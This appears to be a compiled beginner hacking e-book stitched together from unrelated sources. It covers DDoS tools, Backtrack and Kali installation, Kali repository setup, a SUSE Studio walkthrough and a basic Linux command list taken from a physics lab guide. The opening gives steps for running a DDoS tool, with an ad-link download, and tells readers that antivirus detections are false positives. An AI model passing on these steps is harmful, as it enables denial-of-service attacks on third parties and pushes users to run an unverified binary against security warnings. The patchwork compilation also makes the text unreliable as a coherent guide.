Click the big button "IMMA FIRIN MAH LAZAR!"
Feel free to tweak these settings and play around with the program to get the best performance. Then minimize it and go do whatever you need to do; the program will take care of the rest!
DDOS ATTACK BY JANIDOS:-

Download from here:
http://adfoc.us/10187334395229
After downloading, open the toolkit and click on "Try Weak Edition".
This DDoS tool is coded in Visual Basic 6; first you must copy these OCXs to system32:
comdlg32.ocx
msinet.ocx
mscomctl.ocx
mswinsck.ocx
This tool will be flagged as suspicious by antiviruses because the DDoS tool works on port 80, which is also a backdoor port, so it is a false positive detection; don't worry, this tool is clean.

BEGINNING WITH PENETRATION TESTING PLATFORMS

As of now many of you might already know what these penetration testing platforms are. But for those who don't know, here's a simple introduction.
What does penetration testing mean?
Penetration testing basically means finding the loopholes in your system and removing them, so that your system becomes more secure. In other words, penetration tests (pentests for short) are performed by an individual to gather information about the vulnerabilities of his system.
Usually pentesters are software engineers, web developers or what you would call hackers. They perform a pentest on your request or by their own means, but the aim is only finding the loopholes in the system.
Commonly pentests are performed in the following sequence:

Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence
Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software
Assessing the magnitude of potential business and operational impacts of successful attacks
Testing the ability of network defenders to successfully detect and respond to the attacks
Providing evidence to support increased investments in security personnel and technology



What are pentesting distros?
Pentest distros are nothing else but Linux-based OSs which come with the packages that are essential for pentest work included!
Of these, Backtrack and Kali (also known as Backtrack 6) are very famous and good pentesting distros!
Others are:
Blackbox
Security track
Black Ubuntu
Indishell OS
You can even make your own Linux distro (given here afterwards).

Okay, now let's start with common pentest distros.
Here I'm giving installation guides for the following OSs:
1. Backtrack Linux
2. Kali Linux
3. Create your own!
Each of the OSs can be installed in various forms like live USB, live CD or DVD, dual boot on HDD, complete HDD install, or installing in VMware (what's that? discussed later).






BACKTRACK LINUX

If you have not seen this dragon earlier then you are most welcome; this session is for you and you will enjoy it more! Those who know it better, please move to the next session!
What is Backtrack?
BackTrack was a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It was named after backtracking, a search algorithm.
-wikipedia
Get this distribution here: http://www.backtrack-linux.org/

Let's start with installation!
1. Entire hard disk install
2. Dual boot with Windows
3. Live USB install (google this one)
4. Live DVD install (google this one)



Here we go with the first installation method, that is, the full hard disk install.
NOTE: Please note that installing Backtrack on the entire HDD (Hard Disk Drive) will remove all your data, partitions and your previous OS if any is installed. Also, please note that beginners should take care about the procedure they are about to follow! It is only to remove your previous install, if any, and then continue with Backtrack. It is recommended that you have a minimum of 20 GB free disk space to install Backtrack!
1. Boot the Backtrack live environment. (Wondering how to do this? Most people do wonder how to boot into any OS, so please refer here!) There are two ways to do this: you can use either your USB drive or a DVD.
a. USB
i. To make your USB bootable you will need to extract the downloaded ISO onto it using the software Unetbootin (download from http://unetbootin.sourceforge.com).
ii. Restart to boot into USB.
iii. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the boot device from HDD to USB FDD.
b. DVD
i. To make your DVD bootable, burn the DVD with your downloaded ISO as you usually do.
ii. Restart to boot into DVD.
iii. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the boot device from HDD to CD/DVD ROM.
c. Then save by pressing F12 and restart.
d. It will automatically boot into Backtrack.
2. At the bash prompt, type startx to enter the GUI.
3. Double click the Install Backtrack.sh on the desktop.
4. Let's run through the installer step by step:
5. We select our language, in this case English, and then click the Forward button.

6. (screenshot)
7. Here we select our geographical location (the Region and Time Zone) and click Forward.
8. (screenshot)
9. (screenshot)
10. Choose your keyboard layout. We are going to leave it at the default, which is USA, and click Forward.
11. (screenshot)
12. Now it's time to partition the disk; for a full disk installation we choose the "Erase and use the entire disk" option and click Forward.
13. (screenshot)

14. WARNING: Sometimes the installer will get stuck at different percentages; leave it for a while as it will move on. Hit the Restart Now button, and enjoy Backtrack!
15. (screenshot)
16. After the reboot, you can log in with the default username root and password toor. Do not forget to change this default root password by issuing the passwd command in the terminal.
17. As you can see, the splash screen disappeared after the reboot. In order to fix it just run fix-splash, and the splash screen will appear on the next boot.














Dual boot with Windows 7
Note: Before you start, make sure you have made about 20-30 GB of space free. To achieve this you can do it manually from "Create and format hard disk partitions" in the Windows control panel, or you can also use the EaseUS partition manager, which is given in the giveaways at the end of the book!
Also, I suggest you back up your Windows installation using the "create a system recovery disk" option in Windows.
1. Boot the Backtrack live environment. (Wondering how to do this? Most people do wonder how to boot into any OS, so please refer here!) There are two ways to do this: you can use either your USB drive or a DVD.
a. USB
i. To make your USB bootable you will need to extract the downloaded ISO onto it using the software Unetbootin (download from http://unetbootin.sourceforge.com).
ii. Restart to boot into USB.
iii. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the boot device from HDD to USB FDD.
b. DVD
i. To make your DVD bootable, burn the DVD with your downloaded ISO as you usually do.
ii. Restart to boot into DVD.
iii. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the boot device from HDD to CD/DVD ROM.
c. Then save by pressing F12 and restart.
d. It will automatically boot into Backtrack.
2. At the bash prompt, type startx to enter the GUI.
3. Double click the Install Backtrack.sh on the desktop.
4. Let's run through the installer step by step:
5. We select our language, in this case English, and then click the Forward button.

6. (screenshot)
7. Here we select our geographical location (the Region and Time Zone) and click Forward.
8. (screenshot)
9. (screenshot)
10. Choose your keyboard layout. We are going to leave it at the default, which is USA, and click Forward.
11. (screenshot)

12. Now it's time to partition the disk; for a quick and successful dual-boot install we will choose the "Install them side by side, choosing between them each startup" option and hit Forward.

WARNING: The installer might stop at certain percentages; leave it for a few minutes and it will resume.
13. Hit the Restart Now button, and enjoy Backtrack!

14. When the computer boots, you will be given a choice to boot Backtrack or Windows.
15. After the reboot, you can log in with the default username root and password toor. Do not forget to change this default root password by issuing the passwd command.
16. As you can see, the splash screen disappeared after the reboot. In order to fix it just run fix-splash, and the splash screen will appear on the next boot.
Live persistent USB: for this install please refer to http://www.backtrack-linux.org/wiki/index.php/Persistent_USB; however, this install may make Backtrack run slower.




















KALI LINUX

Kali is nowadays proudly called the successor of Backtrack!

However, it's a bit different from Backtrack, i.e. it's a Debian-based system whereas Backtrack is Ubuntu-based.

Download the Kali ISO from http://www.kali.org/

Here we go with the installations.



Hard Disk install
(Bored of typing the same thing; since making a full HDD install isn't complex, as you are ready to format the whole system, I copied this one from the Kali docs.)

KALI LINUX INSTALLATION REQUIREMENTS
Installing Kali Linux on your computer is an easy process. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are minimal as listed below, although better hardware will naturally provide better performance. The i386 images have a default PAE kernel, so you can run them on systems with over 4GB of RAM. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the Kali Linux Network Install.
INSTALLATION PREREQUISITES
A minimum of 8 GB disk space for the Kali Linux install.
For i386 and amd64 architectures, a minimum of 512MB RAM.
CD-DVD Drive / USB boot support
PREPARING FOR THE INSTALLATION
1. Download Kali Linux.
2. Burn the Kali Linux ISO to DVD or image Kali Linux Live to USB.
3. Ensure that your computer is set to boot from CD / USB in your BIOS.






KALI LINUX INSTALLATION PROCEDURE

Note: Before you start, make sure you have made about 20-30 GB of space free. To achieve this you can do it manually from "Create and format hard disk partitions" in the Windows control panel, or you can also use the EaseUS partition manager, which is given in the giveaways at the end of the book!
Also, I suggest you back up your Windows installation using the "create a system recovery disk" option in Windows.
1. Boot the Kali Linux environment. (Wondering how to do this? Most people do wonder how to boot into any OS, so please refer here!) There are two ways to do this: you can use either your USB drive or a DVD.
1. USB
1. To make your USB bootable you will need to extract the downloaded ISO onto it using the software Unetbootin (download from http://unetbootin.sourceforge.com).
2. Restart to boot into USB.
3. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
4. In BIOS setup, change the boot device from HDD to USB FDD.
2. DVD
1. To make your DVD bootable, burn the DVD with your downloaded ISO as you usually do.
2. Restart to boot into DVD.
3. Press Delete when the boot screen lists the IDE drives (pay attention to the messages which appear during reboot), or look at the bottom of the screen where it shows the key to enter BIOS setup.
4. In BIOS setup, change the boot device from HDD to CD/DVD ROM.
3. Then save by pressing F12 and restart.
4. It will automatically boot into Kali.
2. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali boot screen. Choose either Graphical or Text-Mode install. In this example, we chose a GUI install.
3. Select your preferred language and then your country location. You'll also be prompted to configure your keyboard with the appropriate keymap.


4. The installer will copy the image to your hard disk, probe your network interfaces, and then prompt you to enter a hostname for your system. In the example below, we've entered kali as our hostname.

5. Enter a robust password for the root account.

6. Next, set your time zone.

7. The installer will now probe your disks and offer you four choices. In our example, we're using the entire disk on our computer and not configuring LVM (logical volume manager). Experienced users can use the Manual partitioning method for more granular configuration options.



8. Next, you'll have one last chance to review your disk configuration before the installer makes irreversible changes. After you click Continue, the installer will go to work and you'll have an almost finished installation.

9. Configure network mirrors. Kali uses a central repository to distribute applications. You'll need to enter any appropriate proxy information as needed.
NOTE! If you select NO in this screen, you will NOT be able to install packages from Kali repositories.

10. Next, install GRUB.

11. Finally, click Continue to reboot into your new Kali installation.

POST INSTALLATION
Now that you've completed installing Kali Linux, it's time to customize your system. The Kali General Use section of our site has more information and you can also find tips on how to get the most out of Kali in our User Forums.


DUAL BOOT KALI LINUX WITH WINDOWS 7


1. Shrink the Windows 7 C Drive: My test system has an existing installation of
Windows 7 on a 500 GB HDD, with just two primary partitions. This is how they
appear in Windows 7's partition manager. The task here is to shrink the C drive to
create room for installing Kali Linux. To do that, right-click on the C drive and select
Shrink Volume.
Note: If you intend to install Windows 7 afresh, this process will be a lot easier
if you set aside the free space that will be used for Kali Linux during the
installation of Windows 7.

If you have enough free space on the C drive, the system will suggest a 50-50 split
of the free space, which is just good enough for this test installation. Click Shrink.
After the operation has completed, you should see the newly reclaimed space
next to the C drive. You may exit the partition manager and reboot the computer. Be
sure to have the installation disc of Kali Linux in the optical drive before rebooting.

2. Install Kali Linux: The best option to select on Kali Linux's boot menu
is Graphical Install. It gives you a point-and-click installation process. Install works
just as well, but the interface is ncurses-based.
1. Boot the Kali Linux environment. (Wondering how to do this? Most people
do wonder how to boot into any OS, so refer here.) There are two
ways to do this: either use a USB drive or use a DVD.
a. USB
i. To make your USB bootable, you will need to extract the downloaded
ISO onto it using the software Unetbootin (download from
http://unetbootin.sourceforge.com).
ii. Then restart to boot from the USB.
iii. Press Delete when your computer starts loading the IDE drives (watch
the log that appears during reboot), or look at the bottom of the
screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the first boot device from HDD to USB FDD.
b. DVD
i. To make your DVD bootable, burn the DVD with your downloaded ISO
as you usually do.
ii. Then restart to boot from the DVD.
iii. Press Delete when your computer starts loading the IDE drives (watch
the log that appears during reboot), or look at the bottom of the
screen where it shows the key to enter BIOS setup.
iv. In BIOS setup, change the first boot device from HDD to CD/DVD ROM.
c. Then save by pressing F12 and restart.
d. It will automatically boot into Kali.
For installing Kali Linux, the following partitions will be created: /boot, /, /home, and
Swap. In that order. The /home partition is optional. At the disk partitioning methods
step of the installation process, you get a bunch of options. Because none of the
guided options will create a separate /boot partition, creating the partitions will have
to be done manually. So select Manual and click Continue.

Here you can see the existing Windows 7 partitions, both of which are primary
partitions. The free space reclaimed from Windows 7 in the previous step is what
will be used for creating the partitions for Kali Linux. To start creating the partitions,
select the free space and click Continue.

Create a new partition. Continue.

This shows the total amount of disk space available for Kali Linux. The /boot
partition will be created first, so you need to specify the amount of disk space for it.

For this test system, I assigned 300 MB to it. Continue.

Because you still have two primary partitions to use, you can create the boot
partition as a primary or logical partition. Either option will work, but the installer
prefers creating it as a primary partition, if the boot loader is going to be installed in
it. For this test installation, I chose to create it as a logical partition. Continue.

Choose Beginning as the location for the new partition. Continue.

This step shows the details of the boot partition you just created. The only thing you
need to change here is the mount point. Double-clicking on it will open another
window where you can specify the correct mount point.

Here's what it should look like after the mount point has been specified. The other
option you might want to change here is the Bootable flag.

There is a good reason it should be enabled, but the system will boot even if it is
disabled. It just depends on your BIOS version. For this test installation, it was
disabled and the system still worked perfectly.

Here are the final details of the boot partition. Scroll to Done setting up the partition,
then click Continue. Note that the steps you used to create the boot partition will be
repeated for the other partitions.

Back in the main disk partitioning window, you can see the boot partition you just
created, plus the remaining free space. Select the free space, then click Continue.



The next partition will be mounted at /. A new installation of Kali Linux takes up
about 6.4 GB of disk space, so any amount greater than that will do. For the test
installation, I gave it 60 GB, which is way too much, so you do not have to do the
same. About 10-12 GB is more than enough. Continue.

Here are the details of the new partition. Scroll to Done setting up the partition,
then click Continue.

For the home partition, I gave it a disk space of 100 GB. Continue.

Here are the details of the new partition. Scroll to Done setting up the partition,
then click Continue.

For Swap, 2 GB is good enough. Continue.

Here are the default details of the new partition. To specify that it be used as a Swap
partition, double-click the Use as line.

Then select swap area. Continue.

Scroll to Done setting up the partition, then click Continue.

With all the partitions created, scroll to Finish partitioning and write changes to
disk. Continue. Make note of the device number of the boot partition. Here, it
is sda5. You'll need it later.

Select Yes. Continue.

By default, the installer will want to install GRUB, the boot loader, in the
Master Boot Record (MBR). However, for setting up this dual-boot system, we want
GRUB in the boot partition. So, select No. Continue.

This is where you have to specify where GRUB should be installed. For this test
system, it is /dev/sda5. Continue.

After installation, the computer will reboot into Windows 7. The next task involves
adding an entry for Kali Linux in Windows 7's boot menu.
3. Add Kali Linux to Windows 7's boot menu: The simplest graphical
application for modifying the Boot Configuration Data of Windows that I know
is EasyBCD. It is free for personal use. You may download it from here. Install
it as you would any other Windows application. The main window is shown
below. To add an entry for Kali Linux in the boot menu, click on the Add New
Entry tab.


Then click on the Linux/BSD tab. From the Type dropdown menu, select GRUB 2.
Modify the name field to reflect the name of the distribution you are adding. From
the Drive menu, you can either select the specific partition corresponding to the boot
partition of the Kali Linux installation or let EasyBCD automatically locate and load it.
Either one will work. Note that EasyBCD's drive numbers and the device numbers of
the Linux partitions do not match. For example, in this test installation, the boot
partition is /dev/sda5, but the corresponding drive number in EasyBCD is Partition 3.
The size of the partition helps to determine which one it is. Click the Add
Entry button when all the options have been specified.

From the Edit Boot Menu tab, you can see a preview of the entries that will appear
in the Windows 7 boot menu. Exit EasyBCD and reboot the computer. That should
do it.

Extra: Here are all the partitions on the HDD as seen from the Windows 7 partition
manager.

MAKE YOUR OWN LINUX BASED OS
Go to http://susestudio.com/ , it will help you in making your own Linux based
distribution.
Use SUSE Studio to Build a Linux OS From Scratch

Think you can make a better fast-booting, Chrome-focused OS than Google?
Want to craft a custom Linux system that boots from a USB stick? SUSE Studio gives
you 15 GB to do exactly that, and you do it all online.
SUSE Studio is what powered the fan-made "Chrome OS" we posted
yesterday, which, in that case, was a semi-stripped-down system loaded with the
developers' version of Chrome, Google webapp links, and OpenOffice. If speed and
cloud computing aren't your bag, you can create a fully functional system with Firefox,
3D graphics, and whatever apps you can find installed. Want your system to start up
with an AWN dock and Launchy keystroke launcher running? Not a problem.
Even if you don't know all that much about Linux, it's pretty easy to build a
system you can boot from a USB stick or live CD/DVD, run inside a virtual machine
program, or actually install it, or, heck, even test it out in your web browser.
Here's a basic walkthrough of building a system with SUSE Studio. In this case,
we're looking to build a GNOME-based system that would boot fairly quickly and use
Chrome for most of its functions, and use GNOME-Do as the primary application
launcher.
GET AN ACCOUNT, CHOOSE YOUR DESKTOP
First things first, you'll need to grab an invitation and account from SUSE Studio.
While it's invite-only at the moment, I received my invite only 10 minutes after
registering and filling out a quick survey that suggested it would boost my invite reply
time. Once your invite arrives, you can sign into SUSE Studio with your Google or
Yahoo account, or any OpenID provider.

Once you're signed in, head to your "Home" screen and click the "Create new
appliance" link in the upper-right. SUSE Studio calls each bootable system you create
an "appliance" throughout the process. You'll be asked to choose your "base
template," which includes the GNOME and KDE desktops, a Just Enough OS
(jeOS) option, and server or command-line-only choices. Most folks will want to lean
toward GNOME or KDE setups, as they're the most familiar graphical environments.
If you're familiar with Linux enough to know how to build a login manager and desktop
from a command line system, though, go ahead and play around; you can't really
hurt anything.
CHOOSE YOUR SOFTWARE
This is the real meat and potatoes of creating a system. Click the "Software" tab
and check out the packages already going into your system.

Based on your selection of a GNOME desktop, and SUSE Studio assuming you
want the Linux basics needed to boot, a few packages and repositories are already
installed for you. They're based on a basic installation of OpenSUSE, but you could
wipe the slate clean and start over with another RPM-based repository, if you so
chose.

If you wanted to add Firefox to your system, simply search for it in the search
bar farther down the page. Results from the repositories you've chosen appear, and
you can click "Add+" to load them into your system, with dependencies and other
needed packages automatically included. What if you don't see something you know
runs on Linux, like, say, Google Chrome? Find an RPM-formatted package, like
those I found at Ben Kevan's blog, or add in a repository URL that carries regular
updates. Generally, a good Google search for the name of your program and
"OpenSUSE" should yield fruit. Hit the "Upload and Manage RPMs" link near the top
of the Software page, and you'll be able to upload from your computer, or point to a
file on the web. What's really neat is, once you upload your RPM files, you'll have a
special repository created for you that can be loaded into any system you build with
SUSE Studio.
CHANGE THE LOOK AND FEEL
Once you're done tinkering with your apps, head over to the Configuration tab
to mess with your eye candy and determine how your system will boot up. Start at the
"General" sub-section, making sure to change the user name at bottom to something
other than "Tux" and change the password away from the standard "linux." You can
set how you want your system to find a network connection (anything other than the
manual or no-network options should be fine), and whether to enable a firewall.
The Personalize section only has two parameters, but who doesn't like to see
their own logos and backgrounds stamped on a system? Next over, make sure the
"Startup" section has you set to boot into a graphical login. Under "Desktop," you can
set the OS to automatically boot to a desktop for faster start-up times, and the
"Configuration" field lets those planning to install to a disk or USB drive, or run in a
virtual machine, fine-tune their memory and disk use settings. "Overlay files" and
"Scripts" can mostly be skipped, unless you've got documents you need to have in
your test system or already work at a high level of Linux knowledge.




GRAB AND BOOT YOUR OS

The "Build" section is where you get the good stuff. Pick the format you'd like to
download, whether an ISO for creating a CD/DVD, a disk image for hard disk or USB
transfer, or a ready-made virtual machine file for VirtualBox or VMWare. Choose your
format, set a version number, and that build will always be available for downloading
or "cloning." Not quite sure what to do with the files you received? Here's SUSE
Studio's guide to using SUSE Studio appliances, though we'd certainly welcome
more tips, especially on imaging USB drives with .RAW image files, in the comments.
Don't have the time or patience to burn a CD or install a new virtual machine?
SUSE Studio actually lets you run your custom-built appliances on their own
virtualization servers, for up to one hour, for free. Hit the "testdrive" link on one of your
builds, and wait for it to boot up.

I was fairly impressed with the performance of a virtual machine I created
entirely online, running on servers likely a world away and controlled entirely through
a browser.


THE FIRST THINGS YOU MUST DO AFTER FRESH KALI LINUX OR BACKTRACK
LINUX INSTALL
These are the things which need to be done in order to keep ourselves updated
and more secure.
FIRST AND MOST IMPORTANT IS TO EDIT SOME CONTENT OF A FILE WHICH GIVES (SERVES)
YOU UPDATES.
1. Edit Kali Linux 1.0 Repository
nano /etc/apt/sources.list

2. Add these lines:
deb http://http.kali.org/kali main contrib non-free
deb http://http.kali.org/wheezy main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
3. Save and exit.
4. Open a terminal and run:
apt-get update
apt-get install firmware-b43-lpphy-installer

5. Also, get into the habit of running apt-get update at every startup.
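Before that first apt-get update, it is worth checking that every line in /etc/apt/sources.list is well formed and points at the mirror hosts the book uses (http.kali.org and security.kali.org), since a typo or a stray third-party mirror hands package installation to whoever runs it. The script below is an added example, not code from the e-book: it parses a sources.list from a file or stdin, reports each bad entry, and returns non-zero if any was found; the sample entries it checks are constructed here, and the allowed-host list is an assumption you adjust for your own mirror.

```bash
#!/usr/bin/env bash
# Added example (not from the e-book): sanity-check an apt sources.list
# before running apt-get update. Every non-comment line must be a
# well-formed "deb" or "deb-src" entry (type, optional [options], URI,
# suite, components), and every URI must point at one of the expected
# mirror hosts, so a typo or an unexpected mirror is caught before apt
# fetches anything from it.

# Hosts that appear in the book's repository lines (assumption: adjust
# this for your own mirror).
ALLOWED_HOSTS="http.kali.org security.kali.org"

# host_allowed HOST -> 0 if HOST is listed in ALLOWED_HOSTS, 1 otherwise.
host_allowed() {
    local h
    for h in $ALLOWED_HOSTS; do
        [ "$1" = "$h" ] && return 0
    done
    return 1
}

# check_sources [FILE] -> reads FILE (or stdin), prints one diagnostic per
# bad entry, returns 0 only if every entry passed.
check_sources() {
    local file="${1:-/dev/stdin}" lineno=0 bad=0
    local line kind uri host suite tok ncomp
    set -f    # no globbing: "[arch=amd64]" is also a valid glob pattern
    while IFS= read -r line || [ -n "$line" ]; do
        lineno=$((lineno + 1))
        line="${line%%#*}"          # drop a trailing comment
        set -- $line                # split into words (also trims whitespace)
        [ $# -eq 0 ] && continue    # blank or comment-only line
        kind="$1"; shift
        case "$kind" in
            deb|deb-src) ;;
            *) echo "line $lineno: unknown entry type '$kind'"
               bad=$((bad + 1)); continue ;;
        esac
        # Skip an optional "[opt=value ...]" block; it may contain spaces.
        if [ $# -gt 0 ] && [ "${1#\[}" != "$1" ]; then
            while [ $# -gt 0 ]; do
                tok="$1"; shift
                [ "${tok%\]}" != "$tok" ] && break
            done
        fi
        uri="${1:-}"; suite="${2:-}"
        ncomp=$(( $# > 2 ? $# - 2 : 0 ))
        case "$uri" in
            http://*|https://*) ;;
            *) echo "line $lineno: unsupported or missing URI '$uri'"
               bad=$((bad + 1)); continue ;;
        esac
        host="${uri#*://}"; host="${host%%/*}"
        if ! host_allowed "$host"; then
            echo "line $lineno: host '$host' is not an expected Kali mirror"
            bad=$((bad + 1)); continue
        fi
        # A suite ending in "/" is an absolute path and takes no components.
        if [ -z "$suite" ] || { [ "$ncomp" -eq 0 ] && [ "${suite%/}" = "$suite" ]; }; then
            echo "line $lineno: entry needs a suite and at least one component"
            bad=$((bad + 1)); continue
        fi
    done < "$file"
    set +f
    [ "$bad" -eq 0 ]
}

# Constructed sample: the first three entries are the book's own lines, the
# last four are deliberately broken to exercise each check.
sample_sources() {
    cat <<'EOF'
# Kali 1.0 repositories as listed in the book
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://security.kali.org/kali-security kali/updates main contrib non-free
# Broken entries (constructed for this example)
deb http://mirror.example.invalid/kali kali main
rpm http://http.kali.org/kali kali main
deb ftp://http.kali.org/kali kali main
deb http://http.kali.org/kali
EOF
}

demo() {
    echo "Checking constructed sample sources.list:"
    if sample_sources | check_sources; then
        echo "no problems found; safe to run apt-get update"
    else
        echo "fix the entries above before running apt-get update"
    fi
}

demo
```

To check the real file instead of the sample, run `check_sources /etc/apt/sources.list` and act on any line it reports.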

Also, to keep your speakers working, run:
apt-get install veromix

And some apps that you may want. I miss my old apps:
I have missed some stuff, some of it from BT5R3, and others I just like to use.
So I had to install them myself:
- armitage;
- arp-scan;
- Browser add-ons: Elite Proxy Switcher; Firebug; Flash onoff; Greasemonkey with
Cookie injector (http://userscripts.org/scripts/show/119798); HackBar; NoScript;
Poster; Tamper Data.
- filezilla;
- flashplugin-nonfree;
- gedit;
- gwrite;
- htop;
- mysql-workbench;
- sshpass;
- sqlitebrowser;
- zenmap.
---------------------------------
1) To install add-ons press Ctrl+Shift+A, click "Get Add-ons" on the left, then search
for each one (Elite Proxy...);
2) To install Cookie Injector go to the link http://userscripts.org/scripts/show/119798 and
click the "Install" button in the top right corner;

3) To install the other stuff just copy this:
apt-get install -y armitage arp-scan filezilla flashplugin-nonfree gedit gwrite htop mysql-workbench sshpass sqlitebrowser zenmap

BASIC LINUX COMMANDS
Modes of Operation

The Linux operating system used for the PARTICLE DAQ system can be used
either in a terminal mode where you type commands or in a Windows Explorer style
graphical user interface (GUI).

The Explorer-like GUI can be used for file manipulation functions (e.g., copying
a file to a floppy) or deleting or moving files on the disk. It cannot be used to run the
PARTICLE DAQ itself.

To begin using the Explorer-like GUI, double click on the icons on the Desktop.
For the most part, Explorer mode will be familiar from Windows or MAC OS, so with
a few exceptions, this information will not focus on this. Where something is much
more easily done from Explorer mode, it will be highlighted here.

To begin working in the terminal mode, you will need to open a terminal. This
can be accomplished by clicking on the terminal icon in the bottom icon bar, by using
the main menu (footprint icon in lower left of bottom icon bar) System Tools ->New
Terminal.

The Manual (terminal mode)

man - This command brings up the online Unix manual. Use it on each of the
commands below.

For Example:
man pwd - You will see the manual for the pwd command.


Accessing files in Folders (Directories) in terminal mode
pwd - Shows what directory (folder) you are in.
In Linux, your home directory is /home/particle

Let's suppose you have several data files (data1, data2 ... etc.) in a directory called
muondata.
Then suppose the directory muondata is an entry in your main home directory,
/home/particle.
If you are in your home directory (where terminals start) and type pwd, you will see
/home/particle.
If you were in the muondata directory, pwd would give you /home/particle/muondata
instead.
The last slash after a directory name is optional.
As you can see, each slash (/) indicates another sub-directory.

cd - Changes directories.

Examples of relative movement among directories:
cd muondata - Moves down from your current directory into the muondata sub-
directory

cd .. - Moves up one directory (yes, include the two little dots)

You can also move directly into directories
cd /home/particle/muondata - Moves from ANY directory into the muondata sub-
directory of your home directory.

cd ~ - Takes you back to your home directory (/home/particle)

Making or Removing a Directory (terminal mode)

mkdir dirName - Creates a directory with name dirName.

For Example:
mkdir temp - Creates the directory temp.

rmdir dirName - Removes a directory dirName.

For Example:
rmdir temp - Removes the directory temp.
Looking at or Finding your Files (terminal mode)
ls - Lists files.
If you add -al after ls it will give more details for each file, such as size, permissions,
owners, dates etc.
ls -al - You'll see a huge list of files that you can't see with the 'ls' command alone and
lots of details.
If you see such a long list of files that they scroll off the terminal screen, one way to
solve the problem is to use:

ls -al | more - Shows one screen of file names at a time.

less data1 - Dumps the contents of the data1 file to your screen with a pause at each
line so you don't miss any contents as they scroll. You may move through the file
using page up, page down, home and end keys. When done with less you use the q
key to get back to the main terminal.
whereis data1 - Shows you the location of the data1 file.

Altering your Files

rm data1 - Deletes the file data1 in the current directory.

rm -i muon* - Removes all of your muon data files
(careful!! rm * will remove ALL your files)
The "-i" makes the computer prompt before removing each file. If you really want to
work without a net, omit the "-i".

cp data1 newdata/ - will copy the file data1 to the directory newdata (assuming it has
already been created)

mv data1 newdata/ - moves the file data1 to the folder newdata and deletes the old
one.

Using the Floppy Disk Drive in Linux
The simplest way to access the floppy drive under Linux is to use the Explorer-
like interface. However, there is a very important detail! To access the files on the
disk, you have to mount the floppy disk, which means that the operating system will
scan the disk so that it can recognize the files on it. Although your computer will be
perfectly happy to allow you to remove the disk by pushing the eject key on the laptop
floppy drive, this may result in unexpected actions unless you unmount the disk. For
example, your files may be only partly there or not there at all! (This is no different
than under Windows or DOS; it's just that those operating systems hide that detail
from you a little better. This is why, for example, you must eject floppy disks from the
disk properties menu in Windows.)

In the Explorer interface, to mount the floppy, you just double click on the
desktop icon. This will bring up a window with the contents of the floppy, and you may
drag and drop files there, or take any other actions you would with normal files. (Note:
unlike in Windows and MacOS, when you drag a file from your home area to the
floppy, it moves the file instead of making a copy.)

To remove the disk, you must first right-click on the desktop icon, and select
Unmount volume or Eject (either does the same thing). When this is complete (and it
may take a long time since it may have to complete writing files to the floppy!), you
may push the eject button on the floppy to remove it.

Things are more complicated, but possible, in terminal mode:

mount - Mounts a drive to the operating system. Linux does not 'see' the floppy drive
until you tell it to.

For Example:
mount /mnt/floppy - Allows you to use the floppy drive which has directory name
/mnt/floppy

cp aFile /mnt/floppy/ - Copies the file aFile to the floppy disk.

ls /mnt/floppy/ - Allows you to see what files are on your floppy.

You may run into problems moving large files onto a 1.44MB floppy disk. One option
to fit larger files is to create a zip archive containing the file onto the floppy. For
Example:

zip /mnt/floppy/myFile.zip muon.myDataRun - Archives the file muon.myDataRun
into a zip file on the floppy named myFile.zip

After you are done and before you eject it (this is very, very important), you must
unmount the floppy.

umount /mnt/floppy - Allows you to remove the floppy disk

Make sure you wait for the command prompt to reappear (this might take a few
seconds) before ejecting the floppy.
If you eject the floppy before you unmount the floppy, it may corrupt the data on the
floppy and cause the system to be confused if you try to use the floppy again.
If you make a mistake like this, it's probably best to reboot. Sorry.

df - Shows the disk usage. This will tell you how much disk space you have left on
your hard drive as well as the floppy.

More commands are as follows:
A
alias Create an alias
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
B
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
C
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
